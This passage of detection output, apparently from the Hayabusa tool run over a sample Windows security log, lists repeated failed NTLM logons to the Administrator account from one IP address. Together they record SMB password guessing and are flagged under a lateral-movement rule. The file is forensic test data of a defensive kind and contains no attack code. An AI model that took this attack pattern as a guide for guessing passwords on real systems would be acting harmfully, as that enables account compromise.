01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4l15usDM7jggwEyw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9QpOvgDmiOgzQqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 